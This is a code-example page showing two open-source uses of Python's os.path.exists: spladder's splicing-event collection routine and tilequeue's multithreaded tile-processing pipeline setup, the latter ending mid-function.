os.path.exists

Here are the examples of the python api os.path.exists taken from open source projects. By voting up you can indicate which examples are most useful and appropriate.

200 Examples 7

Example 101

Project: spladder
Source File: collect.py
View license
def collect_events(CFG):

    ### which events do we call
    do_exon_skip = ('exon_skip' in CFG['event_types'])
    do_intron_retention = ('intron_retention' in CFG['event_types'])
    do_mult_exon_skip = ('mult_exon_skip' in CFG['event_types'])
    do_alt_3prime = ('alt_3prime' in CFG['event_types'])
    do_alt_5prime = ('alt_5prime' in CFG['event_types'])
    do_mutex_exons = ('mutex_exons' in CFG['event_types'])

    ### init empty event fields
    if do_intron_retention:
        intron_reten_pos = sp.zeros((len(CFG['replicate_idxs']), 1), dtype = 'object')
    if do_exon_skip:
        exon_skip_pos = sp.zeros((len(CFG['replicate_idxs']), 1), dtype = 'object')
    if do_alt_3prime or do_alt_5prime:
        alt_end_5prime_pos = sp.zeros((len(CFG['replicate_idxs']), 1), dtype = 'object')
        alt_end_3prime_pos = sp.zeros((len(CFG['replicate_idxs']), 1), dtype = 'object')
    if do_mult_exon_skip:
        mult_exon_skip_pos = sp.zeros((len(CFG['replicate_idxs']), 1), dtype = 'object')
    if do_mutex_exons:
        mutex_exons_pos = sp.zeros((len(CFG['replicate_idxs']), 1), dtype = 'object')

    validate_tag = ''
    if 'validate_splicegraphs' in CFG and CFG['validate_splicegraphs']:
        validate_tag = '.validated'

    for i in range(len(CFG['samples'])):
        if CFG['same_genestruct_for_all_samples'] == 1 and i == 1:
            break

        if i > 0:
            if do_intron_retention:
                intron_reten_pos = sp.c_[intron_reten_pos, sp.zeros((len(CFG['replicate_idxs']), 1), dtype = 'object')]
            if do_exon_skip:
                exon_skip_pos = sp.c_[exon_skip_pos, sp.zeros((len(CFG['replicate_idxs']), 1), dtype = 'object')]
            if do_alt_3prime or do_alt_5prime:
                alt_end_5prime_pos = sp.c_[alt_end_5prime_pos, sp.zeros((len(CFG['replicate_idxs']), 1), dtype = 'object')]
                alt_end_3prime_pos = sp.c_[alt_end_3prime_pos, sp.zeros((len(CFG['replicate_idxs']), 1), dtype = 'object')]
            if do_mult_exon_skip:
                mult_exon_skip_pos = sp.c_[mult_exon_skip_pos, sp.zeros((len(CFG['replicate_idxs']), 1), dtype = 'object')]
            if do_mutex_exons:
                mutex_exons_pos = sp.c_[mutex_exons_pos, sp.zeros((len(CFG['replicate_idxs']), 1), dtype = 'object')]

        strain = CFG['strains'][i]

        for ridx in CFG['replicate_idxs']:
            if len(CFG['replicate_idxs']) > 1:
                rep_tag = '_R%i' % ridx
            else:
                rep_tag = ''

            if 'spladder_infile' in CFG:
                genes_fnames = CFG['spladder_infile']
            elif CFG['merge_strategy'] == 'single':
                genes_fnames = '%s/spladder/genes_graph_conf%i%s.%s.pickle' % (CFG['out_dirname'], CFG['confidence_level'], rep_tag, CFG['samples'][i])
            else:
                genes_fnames = '%s/spladder/genes_graph_conf%i%s.%s%s.pickle' % (CFG['out_dirname'], CFG['confidence_level'], rep_tag, CFG['merge_strategy'], validate_tag)

            ### define outfile names
            if CFG['merge_strategy'] == 'single':
                fn_out_ir = '%s/%s_intron_retention%s_C%i.pickle' % (CFG['out_dirname'], CFG['samples'][i], rep_tag, CFG['confidence_level'])
                fn_out_es = '%s/%s_exon_skip%s_C%i.pickle' % (CFG['out_dirname'], CFG['samples'][i], rep_tag, CFG['confidence_level'])
                fn_out_mes = '%s/%s_mult_exon_skip%s_C%i.pickle' % (CFG['out_dirname'], CFG['samples'][i], rep_tag, CFG['confidence_level']) 
                fn_out_a5 = '%s/%s_alt_5prime%s_C%i.pickle' % (CFG['out_dirname'], CFG['samples'][i], rep_tag, CFG['confidence_level'])
                fn_out_a3 = '%s/%s_alt_3prime%s_C%i.pickle' % (CFG['out_dirname'], CFG['samples'][i], rep_tag, CFG['confidence_level'])
                fn_out_mex = '%s/%s_mutex_exons%s_C%i.pickle' % (CFG['out_dirname'], CFG['samples'][i], rep_tag, CFG['confidence_level'])
            else:
                fn_out_ir = '%s/%s_intron_retention%s_C%i.pickle' % (CFG['out_dirname'], CFG['merge_strategy'], rep_tag, CFG['confidence_level'])
                fn_out_es = '%s/%s_exon_skip%s_C%i.pickle' % (CFG['out_dirname'], CFG['merge_strategy'], rep_tag, CFG['confidence_level'])
                fn_out_mes = '%s/%s_mult_exon_skip%s_C%i.pickle' % (CFG['out_dirname'], CFG['merge_strategy'], rep_tag, CFG['confidence_level']) 
                fn_out_a5 = '%s/%s_alt_5prime%s_C%i.pickle' % (CFG['out_dirname'], CFG['merge_strategy'], rep_tag, CFG['confidence_level'])
                fn_out_a3 = '%s/%s_alt_3prime%s_C%i.pickle' % (CFG['out_dirname'], CFG['merge_strategy'], rep_tag, CFG['confidence_level'])
                fn_out_mex = '%s/%s_mutex_exons%s_C%i.pickle' % (CFG['out_dirname'], CFG['merge_strategy'], rep_tag, CFG['confidence_level'])

            if do_intron_retention:
                intron_reten_pos[ridx, i] = []
            if do_exon_skip:
                exon_skip_pos[ridx, i] = []
            if do_mult_exon_skip:
                mult_exon_skip_pos[ridx, i] = []
            if do_alt_5prime:
                alt_end_5prime_pos[ridx, i] = []
            if do_alt_3prime:
                alt_end_3prime_pos[ridx, i] = []
            if do_mutex_exons:
                mutex_exons_pos[ridx, i] = []

            print '\nconfidence %i / sample %i / replicate %i' % (CFG['confidence_level'], i, ridx)

            if os.path.exists(genes_fnames):
                print 'Loading gene structure from %s ...' % genes_fnames
                (genes, inserted) = cPickle.load(open(genes_fnames, 'r'))
                print '... done.'
                
                if not 'chrm_lookup' in CFG:
                    CFG = append_chrms(sp.unique(sp.array([x.chr for x in genes], dtype='str')), CFG)

                ### detect intron retentions from splicegraph
                if do_intron_retention:
                    if not os.path.exists(fn_out_ir):
                        idx_intron_reten, intron_intron_reten = detect_events(genes, 'intron_retention', sp.where([x.is_alt for x in genes])[0], CFG)
                        for k in range(len(idx_intron_reten)):
                            gene = genes[idx_intron_reten[k]]

                            ### perform liftover between strains if necessary
                            exons = gene.splicegraph.vertices
                            if not 'reference_strain' in CFG:
                                exons_col = exons
                                exons_col_pos = exons
                            else:
                                exons_col = convert_strain_pos_intervals(gene.chr, gene.splicegraph.vertices.T, strain, CFG['reference_strain']).T
                                exons_col_pos = convert_strain_pos(gene.chr, gene.splicegraph.vertices.T, strain, CFG['reference_strain']).T
                            if exons_col.shape != exons_col_pos.shape: 
                                print 'skipping non-mappable intron retention event'
                                continue

                            ### build intron retention data structure
                            event = Event('intron_retention', gene.chr, gene.strand)
                            event.strain = sp.array([strain])
                            event.exons1 = sp.c_[exons[:, intron_intron_reten[k][0]], exons[:, intron_intron_reten[k][1]]].T
                            event.exons2 = sp.array([exons[:, intron_intron_reten[k][0]][0], exons[:, intron_intron_reten[k][1]][1]])
                            #event.exons2 = exons[:, intron_intron_reten[k][2]]
                            event.exons1_col = sp.c_[exons_col[:, intron_intron_reten[k][0]], exons_col[:, intron_intron_reten[k][1]]]
                            event.exons2_col = sp.array([exons_col[:, intron_intron_reten[k][0]][0], exons_col[:, intron_intron_reten[k][1]][1]])
                            #event.exons2_col = exons_col[:, intron_intron_reten[k][2]]
                            event.gene_name = sp.array([gene.name])
                            event.gene_idx = idx_intron_reten[k]
                            #event.transcript_type = sp.array([gene.transcript_type])
                            intron_reten_pos[ridx, i].append(event)
                    else:
                        print '%s already exists' % fn_out_ir

                ### detect exon_skips from splicegraph
                if do_exon_skip:
                    if not os.path.exists(fn_out_es):
                        idx_exon_skip, exon_exon_skip = detect_events(genes, 'exon_skip', sp.where([x.is_alt for x in genes])[0], CFG)
                        for k in range(len(idx_exon_skip)):
                            gene = genes[idx_exon_skip[k]]

                            ### perform liftover between strains if necessary
                            exons = gene.splicegraph.vertices
                            if not 'reference_strain' in CFG:
                                exons_col = exons
                                exons_col_pos = exons
                            else:
                                exons_col = convert_strain_pos_intervals(gene.chr, gene.splicegraph.vertices.T, strain, CFG['reference_strain']).T
                                exons_col_pos = convert_strain_pos(gene.chr, gene.splicegraph.vertices.T, strain, CFG['reference_strain']).T
                            if exons_col.shape != exons_col_pos.shape: 
                                print 'skipping non-mappable exon_skip event'
                                continue

                            ### build exon skip data structure
                            event = Event('exon_skip', gene.chr, gene.strand)
                            event.strain = sp.array([strain])
                            event.exons1 = sp.c_[exons[:, exon_exon_skip[k][0]], exons[:, exon_exon_skip[k][2]]].T
                            event.exons2 = sp.c_[exons[:, exon_exon_skip[k][0]], exons[:, exon_exon_skip[k][1]], exons[:, exon_exon_skip[k][2]]].T
                            event.exons1_col = sp.c_[exons_col[:, exon_exon_skip[k][0]], exons_col[:, exon_exon_skip[k][2]]].T
                            event.exons2_col = sp.c_[exons_col[:, exon_exon_skip[k][0]], exons_col[:, exon_exon_skip[k][1]], exons_col[:, exon_exon_skip[k][2]]].T
                            event.gene_name = sp.array([gene.name])
                            event.gene_idx = idx_exon_skip[k]
                            #event.transcript_type = sp.array([gene.transcript_type])
                            exon_skip_pos[ridx, i].append(event)
                    else:
                        print '%s already exists' % fn_out_es

                ### detect alternative intron_ends from splicegraph
                if do_alt_3prime or do_alt_5prime:
                    if not os.path.exists(fn_out_a5) or not os.path.exists(fn_out_a3):
                        idx_alt_end_5prime, exon_alt_end_5prime, idx_alt_end_3prime, exon_alt_end_3prime = detect_events(genes, 'alt_prime', sp.where([x.is_alt for x in genes])[0], CFG)
                        ### handle 5 prime events
                        for k in range(len(idx_alt_end_5prime)):
                            gene = genes[idx_alt_end_5prime[k]]

                            ### perform liftover between strains if necessary
                            exons = gene.splicegraph.vertices
                            if not 'reference_strain' in CFG:
                                exons_col = exons
                                exons_col_pos = exons
                            else:
                                exons_col = convert_strain_pos_intervals(gene.chr, gene.splicegraph.vertices.T, strain, CFG['reference_strain']).T
                                exons_col_pos = convert_strain_pos(gene.chr, gene.splicegraph.vertices.T, strain, CFG['reference_strain']).T
                            if exons_col.shape != exons_col_pos.shape: 
                                print 'skipping non-mappable alt 5-prime event'
                                continue
                            
                            for k1 in range(len(exon_alt_end_5prime[k]['fiveprimesites']) - 1):
                                for k2 in range(k1 + 1, len(exon_alt_end_5prime[k]['fiveprimesites'])):

                                    exon_alt1_col = exons_col[:, exon_alt_end_5prime[k]['fiveprimesites'][k1]].T
                                    exon_alt2_col = exons_col[:, exon_alt_end_5prime[k]['fiveprimesites'][k2]].T

                                    ### check if exons overlap
                                    if (exon_alt1_col[0] >= exon_alt2_col[1]) or (exon_alt1_col[1] <= exon_alt2_col[0]):
                                        continue

                                    event = Event('alt_5prime', gene.chr, gene.strand)
                                    event.strain = sp.array([strain])
                                    if gene.strand == '+':
                                        event.exons1 = sp.c_[exons[:, exon_alt_end_5prime[k]['fiveprimesites'][k1]], exons[:, exon_alt_end_5prime[k]['threeprimesite']]].T
                                        event.exons2 = sp.c_[exons[:, exon_alt_end_5prime[k]['fiveprimesites'][k2]], exons[:, exon_alt_end_5prime[k]['threeprimesite']]].T
                                        event.exons1_col = sp.c_[exons_col[:, exon_alt_end_5prime[k]['fiveprimesites'][k1]], exons_col[:, exon_alt_end_5prime[k]['threeprimesite']]].T
                                        event.exons2_col = sp.c_[exons_col[:, exon_alt_end_5prime[k]['fiveprimesites'][k2]], exons_col[:, exon_alt_end_5prime[k]['threeprimesite']]].T
                                    else:
                                        event.exons1 = sp.c_[exons[:, exon_alt_end_5prime[k]['threeprimesite']], exons[:, exon_alt_end_5prime[k]['fiveprimesites'][k1]]].T
                                        event.exons2 = sp.c_[exons[:, exon_alt_end_5prime[k]['threeprimesite']], exons[:, exon_alt_end_5prime[k]['fiveprimesites'][k2]]].T
                                        event.exons1_col = sp.c_[exons_col[:, exon_alt_end_5prime[k]['threeprimesite']], exons_col[:, exon_alt_end_5prime[k]['fiveprimesites'][k1]]].T
                                        event.exons2_col = sp.c_[exons_col[:, exon_alt_end_5prime[k]['threeprimesite']], exons_col[:, exon_alt_end_5prime[k]['fiveprimesites'][k2]]].T
                                    event.gene_name = sp.array([gene.name])
                                    event.gene_idx = idx_alt_end_5prime[k]

                                    ### assert that first isoform is always the shorter one
                                    if sp.sum(event.exons1[:, 1] - event.exons1[:, 0]) > sp.sum(event.exons2[:, 1] - event.exons2[:, 0]):
                                        _tmp = event.exons1.copy()
                                        event.exons1 = event.exons2.copy()
                                        event.exons2 = _tmp
                                    #event.transcript_type = sp.array([gene.transcript_type])
                                    alt_end_5prime_pos[ridx, i].append(event)

                        ### handle 3 prime events
                        for k in range(len(idx_alt_end_3prime)):
                            gene = genes[idx_alt_end_3prime[k]]

                            ### perform liftover between strains if necessary
                            exons = gene.splicegraph.vertices
                            if not 'reference_strain' in CFG:
                                exons_col = exons
                                exons_col_pos = exons
                            else:
                                exons_col = convert_strain_pos_intervals(gene.chr, gene.splicegraph.vertices.T, strain, CFG['reference_strain']).T
                                exons_col_pos = convert_strain_pos(gene.chr, gene.splicegraph.vertices.T, strain, CFG['reference_strain']).T
                            if exons_col.shape != exons_col_pos.shape: 
                                print 'skipping non-mappable alt 3-prime event'
                                continue

                            for k1 in range(len(exon_alt_end_3prime[k]['threeprimesites']) - 1):
                                for k2 in range(k1 + 1, len(exon_alt_end_3prime[k]['threeprimesites'])):

                                    exon_alt1_col = exons_col[:, exon_alt_end_3prime[k]['threeprimesites'][k1]].T
                                    exon_alt2_col = exons_col[:, exon_alt_end_3prime[k]['threeprimesites'][k2]].T

                                    ### check if exons overlap
                                    if (exon_alt1_col[0] >= exon_alt2_col[1]) or (exon_alt1_col[1] <= exon_alt2_col[0]):
                                        continue

                                    event = Event('alt_3prime', gene.chr, gene.strand)
                                    event.strain = sp.array([strain])
                                    if gene.strand == '+':
                                        event.exons1 = sp.c_[exons[:, exon_alt_end_3prime[k]['threeprimesites'][k1]], exons[:, exon_alt_end_3prime[k]['fiveprimesite']]].T
                                        event.exons2 = sp.c_[exons[:, exon_alt_end_3prime[k]['threeprimesites'][k2]], exons[:, exon_alt_end_3prime[k]['fiveprimesite']]].T
                                        event.exons1_col = sp.c_[exons_col[:, exon_alt_end_3prime[k]['threeprimesites'][k1]], exons_col[:, exon_alt_end_3prime[k]['fiveprimesite']]].T
                                        event.exons2_col = sp.c_[exons_col[:, exon_alt_end_3prime[k]['threeprimesites'][k2]], exons_col[:, exon_alt_end_3prime[k]['fiveprimesite']]].T
                                    else:
                                        event.exons1 = sp.c_[exons[:, exon_alt_end_3prime[k]['fiveprimesite']], exons[:, exon_alt_end_3prime[k]['threeprimesites'][k1]]].T
                                        event.exons2 = sp.c_[exons[:, exon_alt_end_3prime[k]['fiveprimesite']], exons[:, exon_alt_end_3prime[k]['threeprimesites'][k2]]].T
                                        event.exons1_col = sp.c_[exons_col[:, exon_alt_end_3prime[k]['fiveprimesite']], exons_col[:, exon_alt_end_3prime[k]['threeprimesites'][k1]]].T
                                        event.exons2_col = sp.c_[exons_col[:, exon_alt_end_3prime[k]['fiveprimesite']], exons_col[:, exon_alt_end_3prime[k]['threeprimesites'][k2]]].T
                                    event.gene_name = sp.array([gene.name])
                                    event.gene_idx = idx_alt_end_3prime[k]

                                    ### assert that first isoform is always the shorter one
                                    if sp.sum(event.exons1[:, 1] - event.exons1[:, 0]) > sp.sum(event.exons2[:, 1] - event.exons2[:, 0]):
                                        _tmp = event.exons1.copy()
                                        event.exons1 = event.exons2.copy()
                                        event.exons2 = _tmp

                                    #event.transcript_type = sp.array([gene.transcript_type])
                                    alt_end_3prime_pos[ridx, i].append(event)
                    else:
                        print '%s and %s already exists' % (fn_out_a5, fn_out_a3)

                ### detect multiple_exon_skips from splicegraph
                if do_mult_exon_skip:
                    if not os.path.exists(fn_out_mes):
                        idx_mult_exon_skip, exon_mult_exon_skip = detect_events(genes, 'mult_exon_skip', sp.where([x.is_alt for x in genes])[0], CFG)
                        for k, gidx in enumerate(idx_mult_exon_skip):
                            gene = genes[gidx] 

                            ### perform liftover between strains if necessary
                            exons = gene.splicegraph.vertices
                            if not 'reference_strain' in CFG:
                                exons_col = exons
                                exons_col_pos = exons
                            else:
                                exons_col = convert_strain_pos_intervals(gene.chr, gene.splicegraph.vertices.T, strain, CFG['reference_strain']).T
                                exons_col_pos = convert_strain_pos(gene.chr, gene.splicegraph.vertices.T, strain, CFG['reference_strain']).T
                            if exons_col.shape != exons_col_pos.shape: 
                                print 'skipping non-mappable multiple exon skip event'
                                continue

                            ### build multiple exon skip data structure
                            event = Event('mult_exon_skip', gene.chr, gene.strand)
                            event.strain = sp.array([strain])
                            event.exons1 = sp.c_[exons[:, exon_mult_exon_skip[k][0]], exons[:, exon_mult_exon_skip[k][2]]].T
                            event.exons2 = sp.c_[exons[:, exon_mult_exon_skip[k][0]], exons[:, exon_mult_exon_skip[k][1]], exons[:, exon_mult_exon_skip[k][2]]].T
                            event.exons1_col = sp.c_[exons_col[:, exon_mult_exon_skip[k][0]], exons_col[:, exon_mult_exon_skip[k][2]]].T
                            event.exons2_col = sp.c_[exons_col[:, exon_mult_exon_skip[k][0]], exons_col[:, exon_mult_exon_skip[k][1]], exons_col[:, exon_mult_exon_skip[k][2]]].T
                            event.gene_name = sp.array([gene.name])
                            event.gene_idx = gidx
                            #event.transcript_type = sp.array([gene.transcript_type])
                            mult_exon_skip_pos[ridx, i].append(event)
                    else:
                        print '%s already exists' % fn_out_mes

                ### detect mutually exclusive exons from splicegraph
                if do_mutex_exons:
                    if not os.path.exists(fn_out_mex):
                        idx_mutex_exons, exon_mutex_exons = detect_events(genes, 'mutex_exons', sp.where([x.is_alt for x in genes])[0], CFG)
                        if len(idx_mutex_exons) > 0:
                            for k in range(len(exon_mutex_exons)):
                                gene = genes[idx_mutex_exons[k]]

                                ### perform liftover between strains if necessary
                                exons = gene.splicegraph.vertices
                                if not 'reference_strain' in CFG:
                                    exons_col = exons
                                    exons_col_pos = exons
                                else:
                                    exons_col = convert_strain_pos_intervals(gene.chr, gene.splicegraph.vertices.T, strain, CFG['reference_strain']).T
                                    exons_col_pos = convert_strain_pos(gene.chr, gene.splicegraph.vertices.T, strain, CFG['reference_strain']).T

                                if exons_col.shape != exons_col_pos.shape: 
                                    print 'skipping non-mappable mutex exons event'
                                    continue

                                ### build data structure for mutually exclusive exons
                                event = Event('mutex_exons', gene.chr, gene.strand)
                                event.strain = sp.array([strain])
                                event.exons1 = sp.c_[exons[:, exon_mutex_exons[k][0]], exons[:, exon_mutex_exons[k][1]], exons[:, exon_mutex_exons[k][3]]].T
                                event.exons2 = sp.c_[exons[:, exon_mutex_exons[k][0]], exons[:, exon_mutex_exons[k][2]], exons[:, exon_mutex_exons[k][3]]].T
                                event.exons1_col = sp.c_[exons_col[:, exon_mutex_exons[k][0]], exons_col[:, exon_mutex_exons[k][1]], exons_col[:, exon_mutex_exons[k][3]]].T
                                event.exons2_col = sp.c_[exons_col[:, exon_mutex_exons[k][0]], exons_col[:, exon_mutex_exons[k][2]], exons_col[:, exon_mutex_exons[k][3]]].T
                                event.gene_name = sp.array([gene.name])
                                event.gene_idx = idx_mutex_exons[k]
                                #event.transcript_type = sp.array([gene.transcript_type])
                                mutex_exons_pos[ridx, i].append(event)
                    else:
                        print '%s already exists' % fn_out_mex

            ### genes file does not exist
            else:
                print 'result file not found: %s' % genes_fnames

    ### combine events for all samples
    for ridx in CFG['replicate_idxs']:

        ################################################%
        ### COMBINE INTRON RETENTIONS
        ################################################%
        if do_intron_retention:
            if not os.path.exists(fn_out_ir):
                intron_reten_pos_all = sp.array([item for sublist in intron_reten_pos[ridx, :] for item in sublist])

                ### post process event structure by sorting and making events unique
                events_all = post_process_event_struct(intron_reten_pos_all, CFG)

                ### store intron retentions
                print 'saving intron retentions to %s' % fn_out_ir
                cPickle.dump(events_all, open(fn_out_ir, 'w'), -1)
            else:
                print '%s already exists' % fn_out_ir
        
        ################################################%
        ### COMBINE EXON SKIPS
        ################################################%
        if do_exon_skip:
            if not os.path.exists(fn_out_es):
                exon_skip_pos_all = sp.array([item for sublist in exon_skip_pos[ridx, :] for item in sublist])

                ### post process event structure by sorting and making events unique
                events_all = post_process_event_struct(exon_skip_pos_all, CFG)

                ### store exon skip events
                print 'saving exon skips to %s' % fn_out_es
                cPickle.dump(events_all, open(fn_out_es, 'w'), -1)
            else:
                print '%s already exists' % fn_out_es

        ################################################%
        ### COMBINE MULTIPLE EXON SKIPS
        ################################################%
        if do_mult_exon_skip:
            if not os.path.exists(fn_out_mes):
                mult_exon_skip_pos_all = sp.array([item for sublist in mult_exon_skip_pos[ridx, :] for item in sublist])

                ### post process event structure by sorting and making events unique
                events_all = post_process_event_struct(mult_exon_skip_pos_all, CFG)

                ### store multiple exon skip events
                print 'saving multiple exon skips to %s' % fn_out_mes
                cPickle.dump(events_all, open(fn_out_mes, 'w'), -1)
            else:
                print '%s already exists' % fn_out_mes

        ################################################%
        ### COMBINE ALT FIVE PRIME EVENTS
        ################################################%
        if do_alt_5prime:
            if not os.path.exists(fn_out_a5):
                alt_end_5prime_pos_all = sp.array([item for sublist in alt_end_5prime_pos[ridx, :] for item in sublist])
              
                ### post process event structure by sorting and making events unique
                events_all = post_process_event_struct(alt_end_5prime_pos_all, CFG)

                ### curate alt prime events
                ### cut to min len, if alt exon lengths differ
                ### remove, if alt exons do not overlap
                if CFG['curate_alt_prime_events']:
                    events_all = curate_alt_prime(events_all, CFG)

                ### store alt 5 prime events
                print 'saving alt 5 prime events to %s' % fn_out_a5
                cPickle.dump(events_all, open(fn_out_a5, 'w'), -1)
            else:
                print '%s already exists' % fn_out_a5

        ################################################%
        ### COMBINE ALT THREE PRIME EVENTS
        ################################################%
        if do_alt_3prime:
            if not os.path.exists(fn_out_a3):
                alt_end_3prime_pos_all = sp.array([item for sublist in alt_end_3prime_pos[ridx, :] for item in sublist])
                ### post process event structure by sorting and making events unique
                events_all = post_process_event_struct(alt_end_3prime_pos_all, CFG)

                ### curate alt prime events
                ### cut to min len, if alt exon lengths differ
                ### remove, if alt exons do not overlap
                if CFG['curate_alt_prime_events']:
                    events_all = curate_alt_prime(events_all, CFG)

                ### store alt 3 prime events
                print 'saving alt 3 prime events to %s' % fn_out_a3
                cPickle.dump(events_all, open(fn_out_a3, 'w'), -1)
            else:
                print '%s already exists' % fn_out_a3

        ################################################%
        ### COMBINE MUTUALLY EXCLUSIVE EXONS
        ################################################%
        if do_mutex_exons:
            if not os.path.exists(fn_out_mex):
                mutex_exons_pos_all = sp.array([item for sublist in mutex_exons_pos[ridx, :] for item in sublist])

                ### post process event structure by sorting and making events unique
                events_all = post_process_event_struct(mutex_exons_pos_all, CFG)

                ### store multiple exon skip events
                print 'saving mutually exclusive exons to %s' % fn_out_mex
                cPickle.dump(events_all, open(fn_out_mex, 'w'), -1)
            else:
                print '%s already exists' % fn_out_mex

Example 102

Project: tilequeue
Source File: command.py
View license
def tilequeue_process(cfg, peripherals):
    logger = make_logger(cfg, 'process')
    logger.warn('tilequeue processing started')

    assert os.path.exists(cfg.query_cfg), \
        'Invalid query config path'

    with open(cfg.query_cfg) as query_cfg_fp:
        query_cfg = yaml.load(query_cfg_fp)
    all_layer_data, layer_data, post_process_data = (
        parse_layer_data(
            query_cfg, cfg.buffer_cfg, cfg.template_path, cfg.reload_templates,
            os.path.dirname(cfg.query_cfg)))

    formats = lookup_formats(cfg.output_formats)

    sqs_queue = peripherals.queue

    store = make_store(cfg.store_type, cfg.s3_bucket, cfg)

    assert cfg.postgresql_conn_info, 'Missing postgresql connection info'

    n_cpu = multiprocessing.cpu_count()
    sqs_messages_per_batch = 10
    n_simultaneous_query_sets = cfg.n_simultaneous_query_sets
    if not n_simultaneous_query_sets:
        # default to number of databases configured
        n_simultaneous_query_sets = len(cfg.postgresql_conn_info['dbnames'])
    assert n_simultaneous_query_sets > 0
    default_queue_buffer_size = 128
    n_layers = len(all_layer_data)
    n_formats = len(formats)
    n_simultaneous_s3_storage = cfg.n_simultaneous_s3_storage
    if not n_simultaneous_s3_storage:
        n_simultaneous_s3_storage = max(n_cpu / 2, 1)
    assert n_simultaneous_s3_storage > 0

    # thread pool used for queries and uploading to s3
    n_total_needed_query = n_layers * n_simultaneous_query_sets
    n_total_needed_s3 = n_formats * n_simultaneous_s3_storage
    n_total_needed = n_total_needed_query + n_total_needed_s3
    n_max_io_workers = 50
    n_io_workers = min(n_total_needed, n_max_io_workers)
    io_pool = ThreadPool(n_io_workers)

    feature_fetcher = DataFetcher(cfg.postgresql_conn_info, all_layer_data,
                                  io_pool, n_layers)

    # create all queues used to manage pipeline

    sqs_input_queue_buffer_size = sqs_messages_per_batch
    # holds coord messages from sqs
    sqs_input_queue = Queue.Queue(sqs_input_queue_buffer_size)

    # holds raw sql results - no filtering or processing done on them
    sql_data_fetch_queue = multiprocessing.Queue(default_queue_buffer_size)

    # holds data after it has been filtered and processed
    # this is where the cpu intensive part of the operation will happen
    # the results will be data that is formatted for each necessary format
    processor_queue = multiprocessing.Queue(default_queue_buffer_size)

    # holds data after it has been sent to s3
    s3_store_queue = Queue.Queue(default_queue_buffer_size)

    # create worker threads/processes
    thread_sqs_queue_reader_stop = threading.Event()
    sqs_queue_reader = SqsQueueReader(sqs_queue, sqs_input_queue, logger,
                                      thread_sqs_queue_reader_stop)

    data_fetch = DataFetch(
        feature_fetcher, sqs_input_queue, sql_data_fetch_queue, io_pool,
        peripherals.redis_cache_index, logger)

    data_processor = ProcessAndFormatData(
        post_process_data, formats, sql_data_fetch_queue, processor_queue,
        cfg.layers_to_format, cfg.buffer_cfg, logger)

    s3_storage = S3Storage(processor_queue, s3_store_queue, io_pool,
                           store, logger)

    thread_sqs_writer_stop = threading.Event()
    sqs_queue_writer = SqsQueueWriter(sqs_queue, s3_store_queue, logger,
                                      thread_sqs_writer_stop)

    def create_and_start_thread(fn, *args):
        t = threading.Thread(target=fn, args=args)
        t.start()
        return t

    thread_sqs_queue_reader = create_and_start_thread(sqs_queue_reader)

    threads_data_fetch = []
    threads_data_fetch_stop = []
    for i in range(n_simultaneous_query_sets):
        thread_data_fetch_stop = threading.Event()
        thread_data_fetch = create_and_start_thread(data_fetch,
                                                    thread_data_fetch_stop)
        threads_data_fetch.append(thread_data_fetch)
        threads_data_fetch_stop.append(thread_data_fetch_stop)

    # create a data processor per cpu
    n_data_processors = n_cpu
    data_processors = []
    data_processors_stop = []
    for i in range(n_data_processors):
        data_processor_stop = multiprocessing.Event()
        process_data_processor = multiprocessing.Process(
            target=data_processor, args=(data_processor_stop,))
        process_data_processor.start()
        data_processors.append(process_data_processor)
        data_processors_stop.append(data_processor_stop)

    threads_s3_storage = []
    threads_s3_storage_stop = []
    for i in range(n_simultaneous_s3_storage):
        thread_s3_storage_stop = threading.Event()
        thread_s3_storage = create_and_start_thread(s3_storage,
                                                    thread_s3_storage_stop)
        threads_s3_storage.append(thread_s3_storage)
        threads_s3_storage_stop.append(thread_s3_storage_stop)

    thread_sqs_writer = create_and_start_thread(sqs_queue_writer)

    if cfg.log_queue_sizes:
        assert(cfg.log_queue_sizes_interval_seconds > 0)
        queue_data = (
            (sqs_input_queue, 'sqs'),
            (sql_data_fetch_queue, 'sql'),
            (processor_queue, 'proc'),
            (s3_store_queue, 's3'),
        )
        queue_printer_thread_stop = threading.Event()
        queue_printer = QueuePrint(
            cfg.log_queue_sizes_interval_seconds, queue_data, logger,
            queue_printer_thread_stop)
        queue_printer_thread = create_and_start_thread(queue_printer)
    else:
        queue_printer_thread = None
        queue_printer_thread_stop = None

    def stop_all_workers(signum, stack):
        logger.warn('tilequeue processing shutdown ...')

        logger.info('requesting all workers (threads and processes) stop ...')

        # each worker guards its read loop with an event object
        # ask all these to stop first

        thread_sqs_queue_reader_stop.set()
        for thread_data_fetch_stop in threads_data_fetch_stop:
            thread_data_fetch_stop.set()
        for data_processor_stop in data_processors_stop:
            data_processor_stop.set()
        for thread_s3_storage_stop in threads_s3_storage_stop:
            thread_s3_storage_stop.set()
        thread_sqs_writer_stop.set()

        if queue_printer_thread_stop:
            queue_printer_thread_stop.set()

        logger.info('requesting all workers (threads and processes) stop ... '
                    'done')

        # Once workers receive a stop event, they will keep reading
        # from their queues until they receive a sentinel value. This
        # is mandatory so that no messages will remain on queues when
        # asked to join. Otherwise, we never terminate.

        logger.info('joining all workers ...')

        logger.info('joining sqs queue reader ...')
        thread_sqs_queue_reader.join()
        logger.info('joining sqs queue reader ... done')
        logger.info('enqueueing sentinels for data fetchers ...')
        for i in range(len(threads_data_fetch)):
            sqs_input_queue.put(None)
        logger.info('enqueueing sentinels for data fetchers ... done')
        logger.info('joining data fetchers ...')
        for thread_data_fetch in threads_data_fetch:
            thread_data_fetch.join()
        logger.info('joining data fetchers ... done')
        logger.info('enqueueing sentinels for data processors ...')
        for i in range(len(data_processors)):
            sql_data_fetch_queue.put(None)
        logger.info('enqueueing sentinels for data processors ... done')
        logger.info('joining data processors ...')
        for data_processor in data_processors:
            data_processor.join()
        logger.info('joining data processors ... done')
        logger.info('enqueueing sentinels for s3 storage ...')
        for i in range(len(threads_s3_storage)):
            processor_queue.put(None)
        logger.info('enqueueing sentinels for s3 storage ... done')
        logger.info('joining s3 storage ...')
        for thread_s3_storage in threads_s3_storage:
            thread_s3_storage.join()
        logger.info('joining s3 storage ... done')
        logger.info('enqueueing sentinel for sqs queue writer ...')
        s3_store_queue.put(None)
        logger.info('enqueueing sentinel for sqs queue writer ... done')
        logger.info('joining sqs queue writer ...')
        thread_sqs_writer.join()
        logger.info('joining sqs queue writer ... done')
        if queue_printer_thread:
            logger.info('joining queue printer ...')
            queue_printer_thread.join()
            logger.info('joining queue printer ... done')

        logger.info('joining all workers ... done')

        logger.info('joining io pool ...')
        io_pool.close()
        io_pool.join()
        logger.info('joining io pool ... done')

        logger.info('joining multiprocess data fetch queue ...')
        sql_data_fetch_queue.close()
        sql_data_fetch_queue.join_thread()
